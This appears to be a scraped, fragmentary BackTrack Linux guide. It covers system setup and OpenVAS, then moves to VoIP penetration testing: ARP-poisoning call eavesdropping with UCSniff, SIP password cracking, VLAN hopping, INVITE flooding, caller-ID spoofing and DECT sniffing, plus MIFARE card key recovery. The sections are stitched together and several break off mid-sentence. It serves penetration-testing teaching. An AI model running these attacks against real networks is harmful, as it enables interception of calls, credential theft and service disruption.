Logging in to BackTrack Once the installation of BackTrack is done, the default username and password required to log in are root / toor. NOTE: You will not be able to see the password as you type it. Starting a GUI Environment After you are logged in you can start the GUI Environment by issuing the startx command. X wont start! In rare occasions (such as after a VMware tools install, or when using unsupported Video cards), X will refuse to start. If that happens you have several options you can try in order to fix the issue: Reconfiguring the X server package, you can reset (and often fix) Xorg configurations with the following command: root@bt:~# dpkg-reconfigure xserver-xorg If you are using Backtrack 5 on x64 with KDE you should try the following: root@bt:~# rm /root/.kde/cache-* NOTE: Sometimes you may need to also remove the cache folders in /var/tmp by issuing the following command: root@bt:~# rm -rf /var/tmp/kdecache-* Getting Networking to work If you haven’t noticed yet BackTrack does not boot with networking by default in order to increase its stealth. Setting your IP manually
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Logging in to BackTrack
Once the installation of BackTrack is done, the default username and password required to
log in are root / toor.
NOTE: You will not be able to see the password as you type it.
Starting a GUI Environment
After you are logged in you can start the GUI Environment by issuing the startx command.
X wont start!
In rare occasions (such as after a VMware tools install, or when using unsupported Video
cards), X will refuse to start. If that happens you have several options you can try in order to
fix the issue:
Reconfiguring the X server package, you can reset (and often fix) Xorg configurations
with the following command:
root@bt:~# dpkg-reconfigure xserver-xorg
If you are using Backtrack 5 on x64 with KDE you should try the following:
root@bt:~# rm /root/.kde/cache-*
NOTE: Sometimes you may need to also remove the cache folders in /var/tmp by issuing
the following command:
root@bt:~# rm -rf /var/tmp/kdecache-*
Getting Networking to work
If you haven’t noticed yet BackTrack does not boot with networking by default in order to
increase its stealth.
Setting your IP manually
We will first set up the networking manually. In the following example we will assume the
following addresses and their purpose:
IP Address - 192.168.1.112/24
Default Gateway - 192.168.1.1 DNS server - 192.168.1.1
In order to set these up we will run the following commands:
In order to get an IP from a DHCP server we can issue the dhclient <interface> command
as follows:
root@bt:~# dhclient eth0
Internet Systems Consortium DHCP Client V3.1.1Copyright 2004-2008 Internet Systems Consortium.All rights reserved.For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth0/00:0c:29:81:74:21Sending on LPF/eth0/00:0c:29:81:74:21Sending on Socket/fallbackDHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67DHCPACK of 192.168.1.112 from 192.168.1.1bound to 192.168.1.112 -- renewal in 37595 seconds.root@bt:~#
Using the script to start networking
There is a script to start networking in the /etc/init.d directory which attempts to start every
interface listen in /etc/network/interfaces (you can remove the ones you don’t need). To
start it issue the following command:
root@bt:~# /etc/init.d/networking start
WICD Network Manager
Another way to set up your networking is using the WICD Network Manager, you can find it
in the menu:
Menu > Internet > Wicd Network Manager
NOTE: Notice that when starting WICD you will get an error:
In order to get rid of this error you have to reboot Backtrack, than BEFORE starting WICD
apt-get install <package> Downloads <package> and all of its dependencies, and installs or
upgrades them.
apt-get remove [--purge] <package> Removes <package> and any packages that depend
on it. --purge specifies that packages should be purged.
apt-get update Updates packages listings from the repo, should be run at least once a
week.
apt-get upgrade Upgrades all currently installed packages with those updates available from
the repo. should be run once a week.
apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or
remove packages to satisfy dependencies.
apt-cache search <pattern> Searches packages and descriptions for <pattern>.
apt-cache show <package> Shows the full description of <package>.
apt-cache showpkg <package> Shows a lot more detail about <package>, and its
relationships to other packages.
man apt Will give you more info on these commands as well as many that are in less
common usage.
Common dpkg commands
dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for
example.
dpkg -c <package.deb> Lists the contents of <package.deb> a .deb file.
dpkg -I <package.deb> Extracts package information from <package.deb> a .deb file.
dpkg -r <package> Removes an installed package named <package>
dpkg -P <package> Purges an installed package named <package>. The difference
between remove and purge is that while remove only deletes data and executables, purge
also deletes all configuration files in addition.
dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c
for checking the contents of a .deb file.
dpkg -s <package> Shows information on the installed package <package>. See also apt-
cache show for viewing package information in the Debian archive and dpkg -I for viewing
package information extracted from a .deb file.
dpkg-reconfigure <package> Reconfigures an installed package
man dpkg Will give you more info on these commands as well as many that are in less
common usage.
How do I find more information on a particular command or programs usage ?
Most commands will have what is called a man page (manual page) which can be viewed
by typing:
root@bt:~# man <command you want more info on>
Another very good resource on linux command usage can be found at linuxcommand.org
Some programs do not have a man page, but you can usually get more information on it's
usage by typing:
root@bt:~# <program name> Just the program name without any arguements.
or
root@bt:~# <program name> -help
or
root@bt:~# <program name> --help
or
root@bt:~# <program name> -h
Some programs use other methods, but they are usually just a variation of one of the above
five commands.
Occasionally you might want to compile code that requires kernel headers (such as compat-
wireless, or other drivers). These are quick instructions on how to do so.
root@bt:~# prepare-kernel-sourcesroot@bt:~# cd /usr/src/linuxroot@bt:~# cp -rf include/generated/* include/linux/
NOTE: You need to be connected to the internet in order to download the linux-source
package.
Enable PAE on Backtrack5 R2
NOTE: Do not change any other settings in your kernel unless you know exactly what
you are doing!
In this tutorial we will proceed to enable PAE on Backtrack5 R2.
We first prepare our kernel and enter the kernel menuconfig.
root@bt:~# prepare-kernel-sourcesroot@bt:/usr/src/linux# zcat /proc/config.gz > .configroot@bt:/usr/src/linux# make menuconfig
After we have launched the ncurses menuconfig we proceed in enabling PAE which can
be found at the following: Processor type and features -> High Memory Support(4) --
> 64GB
Once we have enabled PAE from the menuconfig we proceed into building our kernel.
root@bt:/usr/src/linux# make scriptsroot@bt:/usr/src/linux# make prepareroot@bt:/usr/src/linux# makeroot@bt:/usr/src/linux# update-initramfs -uroot@bt:~# update-grub2
We than reboot and check to see if PAE is enabled.
root@bt:~# cat /boot/config-3.2.4 | grep HIGHMEM</span# CONFIG_HIGHMEM64G is not setCONFIG_HIGHMEM=y
NOTE: Changing additional options in the ncurses config without knowing what the
Exit the ncurses menu config, and build your kernel package:
root@bt:/usr/src/linux# make prepareroot@bt:/usr/src/linux# makeroot@bt:/usr/src/linux# make modules_installroot@bt:/usr/src/linux# make installroot@bt:/usr/src/linux# update-initramfs -uroot@bt:/usr/src/linux# update-grub2
openvasadmin is the username I have chosen to become this user, you however can
substitute that with something better suited to you if you so choose. Make sure you can
remember this username and associated password as you WILL need it when running
openvas.
root@bt:~# openvasad -c 'add_user' -n openvasadmin -r AdminEnter password: ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file provided, the new user will have no restrictions.ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin has been successfully created.root@bt:~#
Starting OpenVAS Manager
Now we need to start Openvas Manager
This runs as a daemon in the background. As I am running everything from my local
machine I will be using localhost to listen on and in this case the default port. This is done
by running the following command.
openvasmd -p 9390 -a 127.0.0.1
Starting OpenVAS Administrator
Now we need to start Openvas Administrator
This also runs as a daemon in the background. As I am running everything from my local
machine I will be using localhost to listen on and in this case the default port. This is done
by running the following command.
openvasad -a 127.0.0.1 -p 9393
Starting Greenbone Security Assistant
Now we need to start Greenbone security Assistant
This again runs as a daemon in the background. As I am running everything from my local
machine I will be using localhost to listen on and in this case the default port. This is done
by running the following command.
gsad --http-only --listen=127.0.0.1 -p 9392
More info on the above commands and other options can be found by running their
associated menu entry and by looking at the man pages. As all three of these run as a
daemon and will continue running until you shutdown you computer, I have provided menu
entries for you so as you can stop them when you no longer need them.
At this point your installation is essentially complete, but as we have got this far we may as
well continue to make sure everything is working as expected.
OpenVAS user interfaces
Greenbone security desktop
Now we need to start an application to enable you to communicate with the scanner and
other daemons.
The first of these choices is greenbone security desktop
Start this from the menu item and fill in the credentials and details we created earlier, then
click the login button.
Once logged in you can use this as your scanning interface, or use the next choice of you
prefer.
Web interface
This next method is via a web interface
Open your favorite browser and enter the following address
127.0.0.1:9392
You will then be presented with a login page. login with the credentials we created earlier.
You can also use the -k key parameter, to add a key to the list of known keys, which is
being tried against your card in the initial phase. The -k option somehow didn't work for me,
so I always compile my known keys directly into mfoc.c Search for “Array with default Mifare
Classic keys” Not sure about other countries, but in country where I live keys are the same.
Once you have keys from all sectors, you should be able to use RFID-Fu against other
cards, which is epic fail.
root@bt:~# nfc-mfclassic --help Usage: nfc-mfclassic r|w a|b <dump.mfd> [<keys.mfd>]r|w - Perform read from (r) or write to (w) card a|b - Use A or B keys for action <dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
<keys.mfd> - MiFare Dump (MFD) that contain the keys (optional)Or: nfc-mfclassic x <dump.mfd> <payload.bin> x - Extract payload (data blocks) from MFD <dump.mfd> - MiFare Dump (MFD) that contains wanted payload <payload.bin> - Binary file where payload will be extracted
Keep in mind that card UID will be not affected (not changed) with this process. Buy some
blank card or Proxmark III if that is what you want. If you are now thinking about dumping
your electronic wallet right after recharge and when credit comes to zero, writing content
back, then please don't do it. What can stop you from doing that? Well, probably only your
conscience, but if the card gets blocked in 24 hours after first use then don't complain. Yes,
there are online checking and billing systems out there for basic cards.
0x04 – ISIC Issue
With ISIC- International Student Identity Card attacker can abuse around ten service not
only one. ISIC cards are widely used for entrance, transportation, dining payments and
various others services or discounts. According to homepage there are 4.5 million
cardholders in 120 countries. Cards should be replaced with more secure types ASAP. It is
possible to do much more than that, but sufficient for demonstration let's play a little...
The whole purpose of this was to get nvcc compiler installed. You can check that everything
is set up correctly:
root@bt:~# which nvcc/opt/cuda/bin/nvccroot@bt:~# nvcc -Vnvcc: NVIDIA (R) Cuda compiler driverCopyright (c) 2005-2011 NVIDIA CorporationBuilt on Sun_Mar_20_16:45:27_PDT_2011Cuda compilation tools, release 4.0, V0.2.1221root@bt:~#
Now that the Nvidia driver and CUDA toolkit are installed, we can test their functionality with
a GPU powered tool such as pyrit.
root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ pyritroot@bt:~# cd pyrit/pyrit && python setup.py build && python setup.py installroot@bt:~# cd ../../root@bt:~# cd pyrit/cpyrit_cuda && python setup.py build && python setup.py install
Run a benchmark to see that everything works as expected:
root@bt:~# pyrit benchmarkPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+
# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allroutersff02::3 ip6-allhosts
NOTE: Do the exact same thing on the client.
Once we have the server and the client setup it's time to enable our SSH server and
transfer the configuration files from the server to the client.
If we start the cluster we should see our server and client.
root@bt:~# mpdboot -v --file=/root/mpd.hosts -n 2running mpdallexit on btLAUNCHED mpd on bt via RUNNING: mpd on btLAUNCHED mpd on 192.168.1.70 via bt2RUNNING: mpd on 192.168.1.70
According to the request made by the client a response will be received with a status or error code, the following tables describe the available requests and responses in the SIP protocol.
SIP Requests / Methods
Request Description
INVITE Used to invite and account to participate in a call session.
ACK Acknowledge an INVITE request.
CANCEL Cancel a pending request.
REGISTER Register user with a SIP server.
OPTIONS Lists information about the capabilities of a caller.
BYE Terminates a session between two users in a call.
REFER
Indicates that the recipient(identified by the Request URI)
should contact a third party using the contact information
provided in the request.
SUBSCRIBE
The SUBSCRIBE method is used to request current state and
state updates from a remote
node.
NOTIFY
The NOTIFY method is used to notify a SIP node that an event
which has been requested by an earlier SUBSCRIBE method has
extensions. Let’s take a look at some of the tools which available
in Backtrack to help us find, identify and enumerate VoIP enabled devices.
SMAP
Backtrack includes a great tool called SMAP which is a simple scanner for
SIP enabled devices SMAP sends off various SIP requests awaiting
responses from SIP enabled DSL router, proxies and user agents.
It could be considered a mash up of NMAP and sipsak.
SMAP Usage:
root@bt:/pentest/voip/smap# ./smap
smap 0.6.0 http://www.wormulon.net/
usage: smap [ Options ]
-h: this help -d: increase debugging -o: enable fingerprinting -O: enable more verbose fingerprinting -l: fingerprint learning mode -t: TCP transport -u: UDP transport (default -P0: Treat all hosts as online - skip host discovery -p : destination port -r : messages per second rate limit -D : SIP domain to use without leading sip: -w : timeout in msec
Another useful feature of SMAP is the –d argument which enables debug output for verbosity try to use the –o along with it to view the fingerprinting process in details.
-h displays this help message -V prints version string only -f FILE the file which contains the SIP message to send use - for standard input -L de-activate CR (\r) insertion in files -s SIPURI the destination server uri in form sip:[user@]servername[:port] -T activates the traceroute mode -U activates the usrloc mode -I simulates a successful calls with itself -M sends messages to itself -C SIPURI use the given uri as Contact in REGISTER -b NUMBER the starting number appendix to the user name (default: 0) -e NUMBER the ending numer of the appendix to the user name -o NUMBER sleep number ms before sending next request -x NUMBER the expires header field value (default: 15) -z NUMBER activates randomly removing of user bindings -F activates the flood mode -R activates the random modues (dangerous) -t NUMBER the maximum number of trashed character in random mode (default: request length) -l PORT the local port to use (default: any) -r PORT the remote port to use (default: 5060) -p HOSTNAME request target (outbound proxy)
-H HOSTNAME overwrites the local hostname in all headers -m NUMBER the value for the max-forwards header field -n use FQDN instead of IPs in the Via-Line -i deactivate the insertion of a Via-Line -a PASSWORD password for authentication (if omitted password="") -u STRING Authentication username -d ignore redirects -v each v produces more verbosity (max. 3) -w extract IP from the warning in reply -g STRING replacement for a special mark in the message -G activates replacement of variables -N returns exit codes Nagios compliant -q STRING search for a RegExp in replies and return error on failure -W NUMBER return Nagios warning if retrans > number -B STRING send a message with string as body -O STRING Content-Disposition value -P NUMBER Number of processes to start -A NUMBER number of test runs and print just timings -S use same port for receiving and sending -c SIPURI use the given uri as From in MESSAGE -D NUMBER timeout multiplier for INVITE transactions and reliable transports (default: 64) -E STRING specify transport to be used -j STRING adds additional headers to the request
Here is an example for using sipsak to fingerprint a sip enabled device We can see in the result that the device we queried is an Audiocodes MP-114 FXS gateway.
** reply received after 67.923 ms ** SIP/2.0 200 OK final received
SIPScan
Sip-scan is a simple scanner for sip enabled hosts it can scan a single host or
an entire subnet.
Sip-scan usage:
root@bt:/pentest/voip/sipscan# ./sip-scan --help
./sip-scan version [unknown] calling Getopt::Std::getopts (version 1.05),running under Perl version 5.10.0. Usage: sip-scan [options]
-v Be verbose. -i ip|if Interface/IP for SIP-headers (default: IP from ppp0) -p port remote port to scan. (default: 5060) -l port local origin of packets. (default: 5060) -d n[p] Wait n ms after each sent packet (default: 50ms) or if 'p' is given, send n packets per second (default: 20) -w n Wait n ms for remaining answers (default: 2000ms)
Network spec contains the wildcard * or ranges n-m.
Svwar has identified all the extensions I’ve created on my Trixbox server. You can specify another sip method by using the –m argument, you can also add t –v or –vv for verbosity.
Enumiax is used to enumerate Asterisk Exchange protocol usernames. It
allows for a dictionary attack or a sequential Username Guessing
root@bt:/pentest/voip/enumiax# ./enumiaxenumIAX 1.0Dustin D. Trammell Usage: enumiax [options] target options: -d Dictionary attack using file -i Interval for auto-save (# of operations, default 1000) -m # Minimum username length (in characters) -M # Maximum username length (in characters) -r # Rate-limit calls (in microseconds) -s Read session state from state file -v Increase verbosity (repeat for additional verbosity) -V Print version information and exit -h Print help/usage information and exit
root@bt:/pentest/voip/enumiax# ./enumiax -v -m3 -M3 192.168.1.104enumIAX 1.0Dustin D. Trammell Target Aquired: 192.168.1.104Connecting to 192.168.1.104 via udp on port 4569...Starting enum process at: Sat Feb 5 13:04:18 2011Now working on 3 character usernames...
root@bt:/pentest/voip/enumiax# ./enumiax -d dict -v 192.168.1.104enumIAX 1.0Dustin D. Trammell Target Aquired: 192.168.1.104Connecting to 192.168.1.104 via udp on port 4569...Starting enum process at: Sat Feb 5 13:02:39 2011
Monitor mode – Should be used on a shared media where the IP phones
connected to i.e : a HUB, wireless access point, it can be also be used in a
switched environment by setting up a SPAN sessions on a Cisco switch.
Man in the middle mode – This mode has 2 additional modes which are
Learning Mode
Targeted Mode
Preparing UCSniff so we can run it from any location in
backtrack:
root@bt:/tmp# cd /pentest/voip/ucsniff/root@bt:/pentest/voip/ucsniff# ./configureroot@bt:/pentest/voip/ucsniff# makeroot@bt:/pentest/voip/ucsniff# make install
Monitor Mode Usage
root@bt:/tmp/ucsniff# ucsniff -i eth0 -MUCSniff 2.1 startingRunning in Monitor ModeFile directory-users.txt can't be opened for reading in working directoryFile targets.txt can't be opened for reading in working directoryListening on eth0... (Ethernet) eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0
Starting Unified sniffing...Warning: Please ensure that you hit 'q' when you are finished with this program.Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.
SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118)
SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104)SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:7-3-both.wav'SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:8-2-both.wav'Closing text interface...
Unified sniffing was stopped.
We can stop the sessions by pressing on the Q key.
Several files were created by UCSniff: Log files – Contains
detailed information about sip transactions Pcap files – capture
file which can be viewed in wireshark audio wav files –
conversation audio files
root@bt:/tmp/ucsniff# ls -ltotal 376-rw-r--r-- 1 root root 40854 Feb 5 05:02 200-Calling-201-5:2:7-3-both.wav-rw-r--r-- 1 root root 115818 Feb 5 05:02 200-Calling-201-5:2:7-3.pcap-rw-r--r-- 1 root root 46294 Feb 5 05:02 200-Calling-201-5:2:8-2-both.wav-rw-r--r-- 1 root root 103940 Feb 5 05:02 200-Calling-201-5:2:8-2.pcap-rw-r--r-- 1 root root 278 Feb 5 05:02 call_detail_log-rw-r--r-- 1 root root 317 Feb 5 05:02 call_log-rw-r--r-- 1 root root 10063 Feb 5 05:02 sip.log-rw-r--r-- 1 root root 39073 Feb 5 05:02 sipdump.pcap-rw-r--r-- 1 root root 0 Feb 5 05:01 skinny_log
MITM Learning Mode Usage
This mode uses a signaling protocol (SIP, Skinny) to map
extensions to an IP Addresses. You can customize the targets
to only intercept specific IP Addresses or Networks. In the
following example we assume we are on the VoIP VLAN
UCSniff will Arp poison all hosts on the subnet.
root@bt:/tmp/ucsniff# ucsniff -i eth0 // //UCSniff 2.1 startingListening on eth0... (Ethernet) eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0Randomizing 255 hosts for scanning...Scanning the whole netmask for 255 hosts...* |==================================================>| 100.00 %ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list)Mapped new target entry: (IP: 192.168.1.118) --> extension 201 and name:Mapped new target entry: (IP: 192.168.1.104) --> extension 200 and name:SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104)SIP Call ended. Conversation recorded in file '201-Calling-200-5:13:4-2-both.wav'Closing text interface...ARP poisoner deactivated.RE-ARPing the victims...Unified sniffing was stopped.
If we take a look at UCSniff log files we can see the discovered targets used in the attack.
Target Mode enables Eavesdropping at a layer higher than just
random audio streams or the IP address of phones for which
you don't know the extension. This mode has 2 sub modes:
Targeted User Targeted Conversation We can add targets
manually to the “targets.txt” file in the following format:
x.x.x.x,extension,,sip 192.168.1.118,201,,sip Or use learning
mode to auto discover hosts
root@bt:/tmp/ucsniff# ucsniff -i eth0 -TUCSniff 2.1 startingFile targets.txt can't be opened for reading in working directoryNo targets have been previously discovered in Targets file, targets.txtPlease run UCSniff in learning mode, or manually edit targets.txt
Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode:
root@bt:/tmp/ucsniff# ucsniff -i eth0 -TUCSniff 2.1 startingParsed 2 entries in Targets file, targets.txtUCSniff running in target mode. Parsed 2 previously discovered targetsPlease select a Targeted Eavesdropping Mode:1. UserDescription: Eavesdrop on all calls to or from a particular endpoint.2. ConversationDescription: Eavesdrop on bi-directional conversation flows between two selected endpoints.Please select option (1) or (2):
Selecting "User" tells the tool to intercept all traffic between the one Target, and the rest of the network.
In "Conversation", two endpoints are selected and the network
is ARP Poisoned to only intercept the traffic between those two
Although Xplico is not in the Backtrack voip tools directory, it is
a very useful tool for capturing SIP and RTP traffic (among
other protocols). Xplico can be found in the Backtrack ->
Digital Forensics -> Forensic Analysis menu
In case it is not present on your Backtrack installation you can
simply install it by issuing the following command:
root@bt:~# apt-get install xplico
Xplico can be used to capture live traffic or import a Wireshark PCAP capture file. Either way Xplico will decode the captured packets and will assemble them into the appropriate format In our case it will be SIP and RTP. After executing Xplico you will be asked to login, the default username and password are: xplico
SIPDump is a part of the SIPCrack tools suite, it allows
performing a live capture of SIP authentication digest response
or it can dump a previously captured sessions from a PCAP
file. SIPDump Usage:
root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0SIPdump 0.3 ( MaJoMu | www.codito.de )---------------------------------------Usage: sipdump [OPTIONS] = file where captured logins will be written to Options: -i = interface to listen on -p = use pcap data file -m = enter login data manually -f "" = set libpcap filter* You need to specify dump file
-s = use stdin for passwords -w wordlist = file containing all passwords to try -p num = print cracking process every n passwords (for -w) (ATTENTION: slows down heavily)* Either -w or -s has to be given
SIPCrack can operate in two modes:
Dictionary attack
STDIN
Dictionary attack
Backtrack provides some basic dictionaries which are
located in:
root@bt:/pentest/passwords/wordlists
But for the purpose of this article I will use another grate tool in backtrack called Crunch which is used to create custom dictionaries. Let’s use crunch to create a six characters numeric dictionary Crunch is located in:
root@bt:/pentest/passwords/crunch# ./crunch 6 6 -f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txtCrunch will now generate 7000000 bytes of dataCrunch will now generate 6 MB of dataCrunch will now generate 0 GB of data100%
We will use a previously captured sip credentials stored by SIPDump in the auth.txt file ans sipass.txt as the dictionary (which we created using crunch)
Cracking the Digest Response:
root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txtSIPcrack 0.3 ( MaJoMu | www.codito.de )----------------------------------------* Found Accounts:Num Server Client User Hash|Password1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd* Select which entry to crack (1 - 1): 1* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Loaded wordlist: 'sipass.txt'* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')* Tried 123457 passwords in 0 seconds
* Found password: '123456'* Updating dump file 'auth.txt'... done
Brute Force attack using John The Ripper
For this attack mode we will be using John the ripper to
redirect johns output into the FIFO file which we’ll feed into
SIPCrack. Creating a FIFO file:
root@bt:/tmp# mkfifo sipcrack
Generating passwords using john and redirecting the output to our FIFO file, for this example we will generate up to 6 digits only.
root@bt:~# john[*] This script will take you to /pentest/passwords/jtr/[*] From there, run ./john root@bt:/pentest/passwords/jtr# ./john --incremental=digits –stdout=6 > /tmp/sipcrack
A typical CISCO switch port configuration for VoIP will look
something like:
Switch# conf tEnter configuration commands, one per line. End with CNTL/Z.Switch(config)#interface fastEthernet 0/1Switch(config-if)#switchport mode accessSwitch(config-if)#switchport access vlan 10Switch(config-if)#switchport voice vlan 20
The IP phone will be configured with the appropriate VLAN ID (20) and the PC data traffic will flow through VLAN 10. Before we begin hopping around we will have to enable support for the 802.1q protocol in Backtrack by typing:
VoIP Hopper also allows one to VLAN Hop to an arbitrary
VLAN, without sniffing for CDP. If you already know the
Voice VLAN ID or would like to VLAN Hop into another
VLAN just specify the vlan id.
root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2Added VLAN 20 to Interface eth0Attempting dhcp request for new interface eth0.20
eth0.20 Link encap:Ethernet HWaddr 00:0c:29:84:98:b2 inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
A denial of service attack on VoIP services can render it
useless by causing an intentionally damage to the network
and VoIP systems availability. This attack can occur on
two levels, standard network dos attacks and VoIP specific
dos attacks. Generally we will send tons of data by
flooding the network to consume all its resources or a
specific protocol in order to overwhelm it with tons of
requests. Let’s take a quick overview of the tools available
in Backtrack
Inviteflood
This tool can be used to flood a target with INVITE
requests it can be used to target sip gateways/proxies and
sip phones.
root@bt:/pentest/voip/inviteflood# ./invitefloodinviteflood - Version 2.0 June 09, 2006 Usage: Mandatory - interface (e.g. eth0) target user (e.g. "" or john.doe or 5000 or "1+210-555-1212") target domain (e.g. enterprise.com or an IPv4 address) IPv4 addr of flood target (ddd.ddd.ddd.ddd) flood stage (i.e. number of packets) Optional - -a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface] -S srcPort (0 - 65535) [default is well-known discard port 9] -D destPort (0 - 65535) [default is well-known SIP port 5060] -l lineString line used by SNOM [default is blank] -s sleep time btwn INVITE msgs (usec) -h help - print this usage -v verbose output mode
Metasploit provides a sip scanner auxiliary which comes in
two flavors TCP and UDP, we can use it to discover SIP
enabled devices using the OPTION method: Let’s see an
example of the UDP version: scanner/sip/options
auxiliary Auxiliary Options and Usage:
msf > use auxiliary/scanner/sip/optionsmsf auxiliary(options) > show options
Module options (auxiliary/scanner/sip/options): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address CPORT 5060 no The local client port RHOSTS yes The target address range or CIDR identifier
RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads TO nobody no The destination username to probe at each host
msf auxiliary(options) > set RHOSTS 192.168.1.130/24RHOSTS => 192.168.1.130/24msf auxiliary(options) > run
Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address CPORT 5060 no The local client port MAXEXT 9999 yes Ending extension METHOD REGISTER yes Enumeration method to use OPTIONS/REGISTER MINEXT 0 yes Starting extension PADLEN 4 yes Cero padding maximum length RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads
Example Usage:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104RHOSTS => 192.168.1.104msf auxiliary(enumerator) > set MINEXT 100MINEXT => 100msf auxiliary(enumerator) > set MAXEXT 500MAXEXT => 500msf auxiliary(enumerator) > set PADLEN 3PADLEN => 3msf auxiliary(enumerator) > run
The voip/sip_invite_spoof auxiliary will create a fake SIP
invite request making the targeted device ring and display
fake caller id information. Auxiliary Options:
msf > use voip/sip_invite_spoofmsf auxiliary(sip_invite_spoof) > show options
Module options (auxiliary/voip/sip_invite_spoof):
Name Current Setting Required Description ---- --------------- -------- ----------- MSG The Metasploit has you yes The spoofed caller id to send RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port SRCADDR 192.168.1.1 yes The sip address the spoofed call is coming from THREADS 1 yes The number of concurrent threads
Example Usage:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104RHOSTS => 192.168.1.104msf auxiliary(sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.104[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
Exploiting VoIP systems
Metasploit includes several exploits for sip client software
and even for the Trixbox PBX web management interface.
Although this is not a SIP specific vulnerability it is still
related and can enable a full control by an attacker on a
This stage is optional for those wanting to build the tools from source code.
root@bt:~# prepare-kernel-sourcesroot@bt:~# cd /usr/src/linuxroot@bt:~# cp -rf include/generated/* include/linux/root@bt:~# cd /pentest/telephonyroot@bt:~# svn co https://dedected.org/svn/trunk dedected_svnroot@bt:~# cd dedected_svn/com-on-air_cs-linux/root@bt:~# make && make -C tools
Install some additional tools
root@bt:~# apt-get -y install audacity
Load the drivers
root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linuxroot@bt:~# make node
If you did not insert your Dosch&Amand Type 2 or Type 3 or Voo:doo # PCMCIA-card do so
now! Next, we load the driver:
root@bt:~# make load
Scan for fixed parts a.k.a. fp (DECT base stations)
root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux/toolsroot@bt:~# ./dect_cli
If you need info on the usage type "help". If you live in the U.S. switch to the US/DECT 6
band via the "band" command. Let's enable someverbosity:
verb
And start scanning for base stations:
fpscan
After scanning 2-3 times through all channels disable verbosity, and stop scanning:
verbstop
Ignore phones you don’t want to sniff (e.g. your neighbours!)
root@bt: /usr/local/src/gpgdir# tar xfj gpgdir-1.9.5.tar.bz2root@bt: /usr/local/src/gpgdir# cd gpgdir-1.9.5root@bt: /usr/local/src/gpgdir/gpgdir-1.9.5# ./install.pl